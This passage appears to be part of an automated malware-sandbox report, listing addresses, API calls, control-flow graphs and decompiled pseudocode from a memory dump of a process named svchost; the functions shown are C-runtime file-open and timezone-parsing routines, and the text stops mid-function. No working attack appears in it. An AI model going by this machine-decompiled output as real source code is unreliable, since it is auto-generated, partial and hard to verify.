                            0x00bdbd4f
                            0x00bdbd6a
                            0x00bdbd6f
                            0x00bdbd72
                            0x00bdbd74
                            0x00bdbd76
                            0x00bdbd95
                            0x00bdbd9c
                            0x00bdbda3
                            0x00bdbda6
                            0x00bdbdb2
                            0x00bdbdb5
                            0x00bdbdbd
                            0x00bdbdbe
                            0x00bdbdc1
                            0x00bdbdc1
                            0x00bdbdc3
                            0x00bdbdc8
                            0x00bdbdca
                            0x00bdbdcd
                            0x00bdbdd5
                            0x00bdbdd8
                            0x00bdbe45
                            0x00bdbe46
                            0x00bdbe4c
                            0x00bdbe4e
                            0x00bdbe97
                            0x00bdbe9a
                            0x00bdbea3
                            0x00bdbea6
                            0x00bdbea9
                            0x00bdbeab
                            0x00bdbeab
                            0x00bdbeab
                            0x00bdbe9c
                            0x00bdbe9f
                            0x00bdbe9f
                            0x00bdbeb0
                            0x00bdbeb3
                            0x00bdbebf
                            0x00bdbec4
                            0x00bdbed0
                            0x00bdbeda
                            0x00bdbede
                            0x00bdbee8
                            0x00bdbeeb
                            0x00bdbef6
                            0x00bdbefb
                            0x00bdbf0b
                            0x00bdbf0e
                            0x00bdbf12
                            0x00bdbf13
                            0x00bdbf19
                            0x00bdbf1e
                            0x00bdbf21
                            0x00bdbf23
                            0x00bdbf25
                            0x00bdbf2a
                            0x00bdbf2d
                            0x00bdbf2f
                            0x00bdbf59
                            0x00bdbf7d
                            0x00bdbf81
                            0x00bdbf85
                            0x00bdbf87
                            0x00bdbf8b
                            0x00bdbf8d
                            0x00bdbf97
                            0x00bdbf9a
                            0x00bdbfa1
                            0x00bdbfa1
                            0x00bdbfa1
                            0x00bdbfa1
                            0x00bdbf8b
                            0x00bdbfa6
                            0x00bdbfb2
                            0x00bdbfb4
                            0x00bdc03f
                            0x00bdc03f
                            0x00000000
                            0x00bdbfba
                            0x00bdbfba
                            0x00bdbfbe
                            0x00000000
                            0x00000000
                            0x00bdbfc3
                            0x00bdbfd5
                            0x00bdbfdd
                            0x00bdbfe0
                            0x00bdbfe1
                            0x00bdbfe4
                            0x00bdbfeb
                            0x00bdbff0
                            0x00bdbff3
                            0x00bdc027
                            0x00bdc031
                            0x00bdc031
                            0x00bdc03b
                            0x00000000
                            0x00bdc03b
                            0x00bdbffc
                            0x00bdc015
                            0x00bdc01c
                            0x00bdbe3f
                            0x00000000
                            0x00bdbe3f
                            0x00bdbfb4
                            0x00bdbf31
                            0x00000000
                            0x00bdbefd
                            0x00bdbf04
                            0x00bdbf07
                            0x00bdbf09
                            0x00bdbf33
                            0x00bdbf35
                            0x00000000
                            0x00bdbf3b
                            0x00000000
                            0x00bdbf09
                            0x00bdbefb
                            0x00bdbe56
                            0x00bdbe59
                            0x00bdbe74
                            0x00bdbe79
                            0x00bdbe7f
                            0x00bdbe81
                            0x00bdbe8c
                            0x00bdbe8c
                            0x00000000
                            0x00bdbe81
                            0x00bdbdda
                            0x00bdbde1
                            0x00bdbde3
                            0x00bdbe1a
                            0x00bdbe1a
                            0x00bdbe24
                            0x00bdbe27
                            0x00bdbe2e
                            0x00bdbe2e
                            0x00bdbe2e
                            0x00bdbe3a
                            0x00000000
                            0x00bdbe3a
                            0x00bdbde5
                            0x00bdbde9
                            0x00000000
                            0x00000000
                            0x00bdbdeb
                            0x00bdbdfa
                            0x00bdbdff
                            0x00bdbe02
                            0x00bdbe03
                            0x00bdbe06
                            0x00bdbe06
                            0x00bdbe0d
                            0x00bdbe0f
                            0x00bdbe12
                            0x00bdbe15
                            0x00bdbe18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdbd78
                            0x00bdbd7d
                            0x00bdbd80
                            0x00bdbd87
                            0x00000000
                            0x00bdbd87
                            0x00bdbd51
                            0x00bdbd56
                            0x00bdbd5c
                            0x00bdbd5e
                            0x00000000
                            0x00bdbd63

                            APIs
                              • Part of subcall function 00BDBA5E: CreateFileW.KERNEL32(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            • GetLastError.KERNEL32 ref: 00BDBE33
                            • __dosmaperr.LIBCMT ref: 00BDBE3A
                            • GetFileType.KERNEL32(00000000), ref: 00BDBE46
                            • GetLastError.KERNEL32 ref: 00BDBE50
                            • __dosmaperr.LIBCMT ref: 00BDBE59
                            • CloseHandle.KERNEL32(00000000), ref: 00BDBE79
                            • CloseHandle.KERNEL32(?), ref: 00BDBFC3
                            • GetLastError.KERNEL32 ref: 00BDBFF5
                            • __dosmaperr.LIBCMT ref: 00BDBFFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction ID: aa122a0cb5c0f08a7937fc7ee9ad12e62324c386382d1b40c349dc7eee5bdba9
                            • Opcode Fuzzy Hash: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction Fuzzy Hash: BDA10532A14145DFCF19DF68DC92FADBBE1EB06320F15019EE815AB392EB718912CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDAFBE, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 404 bdafbe-bdafe6 call bdabfc call bdac5a 409 bdafec-bdaff8 call bdac02 404->409 410 bdb186-bdb1bb call bd1798 call bdabfc call bdac5a 404->410 409->410 415 bdaffe-bdb009 409->415 436 bdb1c1-bdb1cd call bdac02 410->436 437 bdb2e3-bdb33f call bd1798 call bd6cc0 410->437 417 bdb03f-bdb048 call bd09eb 415->417 418 bdb00b-bdb00d 415->418 428 bdb04b-bdb050 417->428 421 bdb00f-bdb013 418->421 424 bdb02f-bdb031 421->424 425 bdb015-bdb017 421->425 427 bdb034-bdb036 424->427 429 bdb019-bdb01f 425->429 430 bdb02b-bdb02d 425->430 432 bdb03c 427->432 433 bdb180-bdb185 427->433 428->428 434 bdb052-bdb073 call bd0a25 call bd09eb 428->434 429->424 435 bdb021-bdb029 429->435 430->427 432->417 434->433 452 bdb079-bdb07c 434->452 435->421 435->430 436->437 444 bdb1d3-bdb1df call bdac2e 436->444 453 bdb349-bdb34c 437->453 454 bdb341-bdb347 437->454 444->437 455 bdb1e5-bdb206 call bd09eb GetTimeZoneInformation 444->455 456 bdb07f-bdb084 452->456 457 bdb38f-bdb3a1 453->457 458 bdb34e-bdb35e call bd0a25 453->458 454->457 468 bdb20c-bdb22d 455->468 469 bdb2bf-bdb2e2 call bdabf6 call bdabea call bdabf0 455->469 456->456 460 bdb086-bdb098 call bd0a73 456->460 461 bdb3b1 call bdb193 457->461 462 bdb3a3-bdb3a6 457->462 474 bdb368-bdb381 call bd6cc0 458->474 475 bdb360 458->475 460->410 472 bdb09e-bdb0b1 call bd50a9 460->472 479 bdb3b6-bdb3cd call bd09eb call bc786a 461->479 462->461 466 bdb3a8-bdb3af call bdafbe 462->466 466->479 477 bdb22f-bdb234 468->477 478 bdb237-bdb23e 468->478 472->410 495 bdb0b7-bdb0ba 472->495 498 bdb386-bdb38c call bd09eb 474->498 499 bdb383-bdb384 474->499 482 bdb361-bdb366 call bd09eb 475->482 477->478 485 bdb256-bdb259 478->485 486 bdb240-bdb247 478->486 504 bdb38e 482->504 488 bdb25c-bdb27d call bd7d59 WideCharToMultiByte 485->488 486->485 493 bdb249-bdb254 486->493 510 bdb27f-bdb282 488->510 511 bdb28b-bdb28d 488->511 493->488 502 bdb0bc-bdb0c0 495->502 503 bdb0c2-bdb0cb 495->503 498->504 499->482 502->495 502->503 512 bdb0cd 503->512 513 bdb0ce-bdb0db call bd1594 503->513 504->457 510->511 515 bdb284-bdb289 510->515 516 bdb28f-bdb2ab WideCharToMultiByte 511->516 512->513 522 bdb0de-bdb0e2 513->522 515->516 518 bdb2ad-bdb2b0 516->518 519 bdb2ba-bdb2bd 516->519 518->519 521 bdb2b2-bdb2b8 518->521 519->469 521->469 523 bdb0ec-bdb0ed 522->523 524 bdb0e4-bdb0e6 522->524 523->522 525 bdb0ef-bdb0f2 524->525 526 bdb0e8-bdb0ea 524->526 527 bdb0f4-bdb107 call bd1594 525->527 528 bdb136-bdb138 525->528 526->523 526->525 536 bdb10e-bdb112 527->536 530 bdb13f-bdb14e 528->530 531 bdb13a-bdb13c 528->531 533 bdb166-bdb169 530->533 534 bdb150-bdb162 call bd50a9 530->534 531->530 537 bdb16c-bdb17e call bdabf6 call bdabea 533->537 534->537 542 bdb164 534->542 539 bdb109-bdb10b 536->539 540 bdb114-bdb117 536->540 537->433 539->540 543 bdb10d 539->543 540->528 544 bdb119-bdb129 call bd1594 540->544 542->410 543->536 550 bdb130-bdb134 544->550 550->528 551 bdb12b-bdb12d 550->551 551->528 552 bdb12f 551->552 552->550
                            C-Code - Quality: 78%
                            			E00BDAFBE(void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				char _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				void* _t80;
				signed int _t84;
				signed int _t88;
				signed int _t90;
				long _t92;
				signed int* _t95;
				signed int _t98;
				signed int _t101;
				signed int _t105;
				void* _t112;
				signed int _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t130;
				void* _t132;
				signed int _t133;
				signed int _t135;
				void* _t141;
				intOrPtr _t142;
				void* _t144;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int _t159;
				signed int _t162;
				intOrPtr* _t167;
				intOrPtr _t168;
				signed int _t169;
				intOrPtr* _t170;
				void* _t171;
				void* _t172;
				signed int _t173;
				int _t177;
				signed int _t179;
				char** _t180;
				signed int _t184;
				signed int _t186;
				void* _t195;
				signed int _t196;
				void* _t197;
				signed int _t198;

				_push(_t179);
				_t65 = E00BDABFC();
				_v8 = _v8 & 0x00000000;
				_t135 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t135;
				if(E00BDAC5A( &_v8) != 0 || E00BDAC02( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00BD1798();
					asm("int3");
					_t195 = _t197;
					_t198 = _t197 - 0x10;
					_push(_t135);
					_t180 = E00BDABFC();
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E00BDAC5A( &_v52);
					_t144 = _t179;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00BD1798();
						asm("int3");
						_push(_t195);
						_t196 = _t198;
						_t74 =  *0xbec008; // 0x2eb5fe5e
						_v100 = _t74 ^ _t196;
						 *0xbec91c =  *0xbec91c | 0xffffffff;
						 *0xbec910 =  *0xbec910 | 0xffffffff;
						_push(0);
						_push(_t180);
						_push(_t172);
						_t137 = "TZ";
						_t173 = 0;
						 *0xbf6578 = 0;
						_t78 = E00BD6CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ");
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t186 = E00BD0A25(_t144, _v276);
								__eflags = _t186;
								if(__eflags != 0) {
									_t84 = E00BD6CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
									__eflags = _t84;
									if(_t84 == 0) {
										E00BD09EB(0);
										_t173 = _t186;
									} else {
										_push(_t186);
										goto L72;
									}
								} else {
									_push(0);
									L72:
									E00BD09EB();
								}
							}
						} else {
							_t173 =  &_v272;
						}
						asm("sbb esi, esi");
						_t184 =  ~(_t173 -  &_v272) & _t173;
						__eflags = _t173;
						if(_t173 == 0) {
							L80:
							L47(); // executed
						} else {
							__eflags =  *_t173;
							if(__eflags == 0) {
								goto L80;
							} else {
								_push(_t173);
								E00BDAFBE(__eflags);
							}
						}
						_t80 = E00BD09EB(_t184);
						__eflags = _v16 ^ _t196;
						E00BC786A();
						return _t80;
					} else {
						_t88 = E00BDAC02( &_v16);
						_pop(_t144);
						__eflags = _t88;
						if(_t88 != 0) {
							goto L66;
						} else {
							_t90 = E00BDAC2E( &_v20);
							_pop(_t144);
							__eflags = _t90;
							if(_t90 != 0) {
								goto L66;
							} else {
								E00BD09EB( *0xbf6574);
								 *0xbf6574 = 0;
								 *_t198 = 0xbf6580; // executed
								_t92 = GetTimeZoneInformation(??); // executed
								__eflags = _t92 - 0xffffffff;
								if(_t92 != 0xffffffff) {
									_t151 =  *0xbf6580 * 0x3c;
									_t169 =  *0xbf65d4; // 0x0
									_push(_t172);
									 *0xbf6578 = 1;
									_v12 = _t151;
									__eflags =  *0xbf65c6; // 0xb
									if(__eflags != 0) {
										_t152 = _t151 + _t169 * 0x3c;
										__eflags = _t152;
										_v12 = _t152;
									}
									__eflags =  *0xbf661a; // 0x3
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t105 =  *0xbf6628; // 0xffffffc4
										__eflags = _t105;
										if(_t105 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t105 - _t169) * 0x3c;
										}
									}
									_t177 = E00BD7D59(0, _t169);
									_t98 = WideCharToMultiByte(_t177, 0, "Pacific Standard Time", 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
									__eflags = _t98;
									if(_t98 == 0) {
										L60:
										 *( *_t180) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t180)[0x3f] = 0;
										}
									}
									_t101 = WideCharToMultiByte(_t177, 0, "Pacific Daylight Time", 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
									__eflags = _t101;
									if(_t101 == 0) {
										L64:
										 *(_t180[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t180[1][0x3f] = 0;
										}
									}
								}
								 *(E00BDABF6()) = _v12;
								 *((intOrPtr*)(E00BDABEA())) = _v16;
								_t95 = E00BDABF0();
								 *_t95 = _v20;
								return _t95;
							}
						}
					}
				} else {
					_t170 =  *0xbf6574; // 0x0
					_t179 = _a4;
					if(_t170 == 0) {
						L12:
						E00BD09EB(_t170);
						_t155 = _t179;
						_t12 = _t155 + 1; // 0xbdb3af
						_t171 = _t12;
						do {
							_t112 =  *_t155;
							_t155 = _t155 + 1;
						} while (_t112 != 0);
						_t13 = _t155 - _t171 + 1; // 0xbdb3b0
						 *0xbf6574 = E00BD0A25(_t155 - _t171, _t13);
						_t115 = E00BD09EB(0);
						_t168 =  *0xbf6574; // 0x0
						if(_t168 == 0) {
							goto L45;
						} else {
							_t159 = _t179;
							_push(_t172);
							_t14 = _t159 + 1; // 0xbdb3af
							_t172 = _t14;
							do {
								_t116 =  *_t159;
								_t159 = _t159 + 1;
							} while (_t116 != 0);
							_t15 = _t159 - _t172 + 1; // 0xbdb3b0
							_t118 = E00BD0A73(_t168, _t15, _t179);
							_t197 = _t197 + 0xc;
							if(_t118 != 0) {
								goto L46;
							} else {
								_t172 = 3;
								_push(_t172);
								_t119 = E00BD50A9(_t160,  *_t135, 0x40, _t179);
								_t197 = _t197 + 0x10;
								if(_t119 != 0) {
									goto L46;
								} else {
									while( *_t179 != 0) {
										_t179 = _t179 + 1;
										_t172 = _t172 - 1;
										if(_t172 != 0) {
											continue;
										}
										break;
									}
									_pop(_t172);
									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
									if(_t135 != 0) {
										_t179 = _t179 + 1;
									}
									_t162 = E00BD1594(_t160, _t179) * 0xe10;
									_v8 = _t162;
									while(1) {
										_t121 =  *_t179;
										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
											break;
										}
										_t179 = _t179 + 1;
									}
									__eflags =  *_t179 - 0x3a;
									if( *_t179 == 0x3a) {
										_t179 = _t179 + 1;
										_t162 = _v8 + E00BD1594(_t162, _t179) * 0x3c;
										_v8 = _t162;
										while(1) {
											_t130 =  *_t179;
											__eflags = _t130 - 0x30;
											if(_t130 < 0x30) {
												break;
											}
											__eflags = _t130 - 0x39;
											if(_t130 <= 0x39) {
												_t179 = _t179 + 1;
												__eflags = _t179;
												continue;
											}
											break;
										}
										__eflags =  *_t179 - 0x3a;
										if( *_t179 == 0x3a) {
											_t179 = _t179 + 1;
											_t162 = _v8 + E00BD1594(_t162, _t179);
											_v8 = _t162;
											while(1) {
												_t132 =  *_t179;
												__eflags = _t132 - 0x30;
												if(_t132 < 0x30) {
													goto L38;
												}
												__eflags = _t132 - 0x39;
												if(_t132 <= 0x39) {
													_t179 = _t179 + 1;
													__eflags = _t179;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t135;
									if(_t135 != 0) {
										_v8 = _t162;
									}
									__eflags =  *_t179;
									_t123 = 0 |  *_t179 != 0x00000000;
									_v16 = _t123;
									__eflags = _t123;
									_t124 = _v12;
									if(_t123 == 0) {
										_t29 = _t124 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										goto L44;
									} else {
										_push(3);
										_t28 = _t124 + 4; // 0xfffffddd
										_t127 = E00BD50A9(_t162,  *_t28, 0x40, _t179);
										_t197 = _t197 + 0x10;
										__eflags = _t127;
										if(_t127 == 0) {
											L44:
											 *(E00BDABF6()) = _v8;
											_t115 = E00BDABEA();
											 *_t115 = _v16;
											goto L45;
										} else {
											goto L46;
										}
									}
								}
							}
						}
					} else {
						_t167 = _t170;
						_t133 = _t179;
						while(1) {
							_t141 =  *_t133;
							if(_t141 !=  *_t167) {
								break;
							}
							if(_t141 == 0) {
								L8:
								_t115 = 0;
							} else {
								_t9 = _t133 + 1; // 0xdde805eb
								_t142 =  *_t9;
								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
									break;
								} else {
									_t133 = _t133 + 2;
									_t167 = _t167 + 2;
									if(_t142 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t115 == 0) {
								L45:
								return _t115;
							} else {
								_t135 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t115 = _t133 | 0x00000001;
						__eflags = _t115;
						goto L10;
					}
				}
				L82:
			}







































































                            0x00bdafc7
                            0x00bdafc8
                            0x00bdafcd
                            0x00bdafd1
                            0x00bdafd3
                            0x00bdafdb
                            0x00bdafe6
                            0x00bdb186
                            0x00bdb188
                            0x00bdb189
                            0x00bdb18a
                            0x00bdb18b
                            0x00bdb18c
                            0x00bdb18d
                            0x00bdb192
                            0x00bdb196
                            0x00bdb198
                            0x00bdb19b
                            0x00bdb1a2
                            0x00bdb1a9
                            0x00bdb1ad
                            0x00bdb1b0
                            0x00bdb1b3
                            0x00bdb1b8
                            0x00bdb1b9
                            0x00bdb1bb
                            0x00bdb2e3
                            0x00bdb2e3
                            0x00bdb2e4
                            0x00bdb2e5
                            0x00bdb2e6
                            0x00bdb2e7
                            0x00bdb2e8
                            0x00bdb2ed
                            0x00bdb2f0
                            0x00bdb2f1
                            0x00bdb2f9
                            0x00bdb300
                            0x00bdb303
                            0x00bdb310
                            0x00bdb317
                            0x00bdb318
                            0x00bdb319
                            0x00bdb31a
                            0x00bdb31f
                            0x00bdb32e
                            0x00bdb335
                            0x00bdb33d
                            0x00bdb33f
                            0x00bdb349
                            0x00bdb34c
                            0x00bdb359
                            0x00bdb35c
                            0x00bdb35e
                            0x00bdb377
                            0x00bdb37f
                            0x00bdb381
                            0x00bdb387
                            0x00bdb38c
                            0x00bdb383
                            0x00bdb383
                            0x00000000
                            0x00bdb383
                            0x00bdb360
                            0x00bdb360
                            0x00bdb361
                            0x00bdb361
                            0x00bdb361
                            0x00bdb38e
                            0x00bdb341
                            0x00bdb341
                            0x00bdb341
                            0x00bdb39b
                            0x00bdb39d
                            0x00bdb39f
                            0x00bdb3a1
                            0x00bdb3b1
                            0x00bdb3b1
                            0x00bdb3a3
                            0x00bdb3a3
                            0x00bdb3a6
                            0x00000000
                            0x00bdb3a8
                            0x00bdb3a8
                            0x00bdb3a9
                            0x00bdb3ae
                            0x00bdb3a6
                            0x00bdb3b7
                            0x00bdb3c2
                            0x00bdb3c5
                            0x00bdb3cd
                            0x00bdb1c1
                            0x00bdb1c5
                            0x00bdb1ca
                            0x00bdb1cb
                            0x00bdb1cd
                            0x00000000
                            0x00bdb1d3
                            0x00bdb1d7
                            0x00bdb1dc
                            0x00bdb1dd
                            0x00bdb1df
                            0x00000000
                            0x00bdb1e5
                            0x00bdb1eb
                            0x00bdb1f0
                            0x00bdb1f6
                            0x00bdb1fd
                            0x00bdb203
                            0x00bdb206
                            0x00bdb20c
                            0x00bdb213
                            0x00bdb219
                            0x00bdb21d
                            0x00bdb223
                            0x00bdb226
                            0x00bdb22d
                            0x00bdb232
                            0x00bdb232
                            0x00bdb234
                            0x00bdb234
                            0x00bdb237
                            0x00bdb23e
                            0x00bdb256
                            0x00bdb256
                            0x00bdb259
                            0x00bdb240
                            0x00bdb240
                            0x00bdb245
                            0x00bdb247
                            0x00000000
                            0x00bdb249
                            0x00bdb24b
                            0x00bdb251
                            0x00bdb251
                            0x00bdb247
                            0x00bdb261
                            0x00bdb275
                            0x00bdb27b
                            0x00bdb27d
                            0x00bdb28b
                            0x00bdb28d
                            0x00bdb27f
                            0x00bdb27f
                            0x00bdb282
                            0x00000000
                            0x00bdb284
                            0x00bdb286
                            0x00bdb286
                            0x00bdb282
                            0x00bdb2a2
                            0x00bdb2a9
                            0x00bdb2ab
                            0x00bdb2ba
                            0x00bdb2bd
                            0x00bdb2ad
                            0x00bdb2ad
                            0x00bdb2b0
                            0x00000000
                            0x00bdb2b2
                            0x00bdb2b5
                            0x00bdb2b5
                            0x00bdb2b0
                            0x00bdb2ab
                            0x00bdb2c7
                            0x00bdb2d1
                            0x00bdb2d6
                            0x00bdb2db
                            0x00bdb2e2
                            0x00bdb2e2
                            0x00bdb1df
                            0x00bdb1cd
                            0x00bdaffe
                            0x00bdaffe
                            0x00bdb004
                            0x00bdb009
                            0x00bdb03f
                            0x00bdb040
                            0x00bdb046
                            0x00bdb048
                            0x00bdb048
                            0x00bdb04b
                            0x00bdb04b
                            0x00bdb04d
                            0x00bdb04e
                            0x00bdb054
                            0x00bdb05f
                            0x00bdb064
                            0x00bdb069
                            0x00bdb073
                            0x00000000
                            0x00bdb079
                            0x00bdb079
                            0x00bdb07b
                            0x00bdb07c
                            0x00bdb07c
                            0x00bdb07f
                            0x00bdb07f
                            0x00bdb081
                            0x00bdb082
                            0x00bdb089
                            0x00bdb08e
                            0x00bdb093
                            0x00bdb098
                            0x00000000
                            0x00bdb09e
                            0x00bdb0a0
                            0x00bdb0a1
                            0x00bdb0a7
                            0x00bdb0ac
                            0x00bdb0b1
                            0x00000000
                            0x00bdb0b7
                            0x00bdb0b7
                            0x00bdb0bc
                            0x00bdb0bd
                            0x00bdb0c0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdb0c0
                            0x00bdb0c5
                            0x00bdb0c6
                            0x00bdb0cb
                            0x00bdb0cd
                            0x00bdb0cd
                            0x00bdb0d5
                            0x00bdb0db
                            0x00bdb0de
                            0x00bdb0de
                            0x00bdb0e2
                            0x00000000
                            0x00000000
                            0x00bdb0ec
                            0x00bdb0ec
                            0x00bdb0ef
                            0x00bdb0f2
                            0x00bdb0f4
                            0x00bdb102
                            0x00bdb104
                            0x00bdb10e
                            0x00bdb10e
                            0x00bdb110
                            0x00bdb112
                            0x00000000
                            0x00000000
                            0x00bdb109
                            0x00bdb10b
                            0x00bdb10d
                            0x00bdb10d
                            0x00000000
                            0x00bdb10d
                            0x00000000
                            0x00bdb10b
                            0x00bdb114
                            0x00bdb117
                            0x00bdb119
                            0x00bdb124
                            0x00bdb126
                            0x00bdb130
                            0x00bdb130
                            0x00bdb132
                            0x00bdb134
                            0x00000000
                            0x00000000
                            0x00bdb12b
                            0x00bdb12d
                            0x00bdb12f
                            0x00bdb12f
                            0x00000000
                            0x00bdb12f
                            0x00000000
                            0x00bdb12d
                            0x00bdb130
                            0x00bdb117
                            0x00bdb136
                            0x00bdb136
                            0x00bdb138
                            0x00bdb13c
                            0x00bdb13c
                            0x00bdb141
                            0x00bdb143
                            0x00bdb146
                            0x00bdb149
                            0x00bdb14b
                            0x00bdb14e
                            0x00bdb166
                            0x00bdb169
                            0x00000000
                            0x00bdb150
                            0x00bdb150
                            0x00bdb155
                            0x00bdb158
                            0x00bdb15d
                            0x00bdb160
                            0x00bdb162
                            0x00bdb16c
                            0x00bdb174
                            0x00bdb179
                            0x00bdb17e
                            0x00000000
                            0x00bdb164
                            0x00000000
                            0x00bdb164
                            0x00bdb162
                            0x00bdb14e
                            0x00bdb0b1
                            0x00bdb098
                            0x00bdb00b
                            0x00bdb00b
                            0x00bdb00d
                            0x00bdb00f
                            0x00bdb00f
                            0x00bdb013
                            0x00000000
                            0x00000000
                            0x00bdb017
                            0x00bdb02b
                            0x00bdb02b
                            0x00bdb019
                            0x00bdb019
                            0x00bdb019
                            0x00bdb01f
                            0x00000000
                            0x00bdb021
                            0x00bdb021
                            0x00bdb024
                            0x00bdb029
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdb029
                            0x00bdb01f
                            0x00bdb034
                            0x00bdb036
                            0x00bdb180
                            0x00bdb185
                            0x00bdb03c
                            0x00bdb03c
                            0x00000000
                            0x00bdb03c
                            0x00000000
                            0x00bdb036
                            0x00bdb02f
                            0x00bdb031
                            0x00bdb031
                            0x00000000
                            0x00bdb031
                            0x00bdb009
                            0x00000000

                            APIs
                            • _free.LIBCMT ref: 00BDB040
                            • _free.LIBCMT ref: 00BDB064
                            • _free.LIBCMT ref: 00BDB1EB
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB3B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            • API String ID: 314583886-1154798116
                            • Opcode ID: 73253d48d7b45d11a6e6d3e142c784f8a39931d726a8d53367f8e0e038453b04
                            • Instruction ID: 101df5595170c555dca53a3128017a6c3a75d5103b1b8f59af01a1da50abf2ba
                            • Opcode Fuzzy Hash: 73253d48d7b45d11a6e6d3e142c784f8a39931d726a8d53367f8e0e038453b04
                            • Instruction Fuzzy Hash: 34C1E172900249EBDB249F688891EAEFBE9EF55350F1541EBE894A7352FB308E41C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BC1220, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 101COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 55%
                            			E00BC1220(void* __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t10;
				void* _t12;
				void* _t14;
				intOrPtr _t15;
				intOrPtr _t32;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t41;
				intOrPtr _t44;
				void* _t49;
				void* _t51;
				void* _t52;

				_t38 = __edx;
				_t37 = __ecx;
				_t39 =  *((intOrPtr*)(_t49 + 8));
				if( *_t39 != 0) {
					L3:
					_t44 =  *((intOrPtr*)(_t49 + 0x14));
					_push(0);
					L00BC7864();
					_t12 = E00BC9F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
					_push( *((intOrPtr*)(_t44 + 8)));
					L00BC7864();
					_push(_t12);
					_t32 = E00BC9808(_t37);
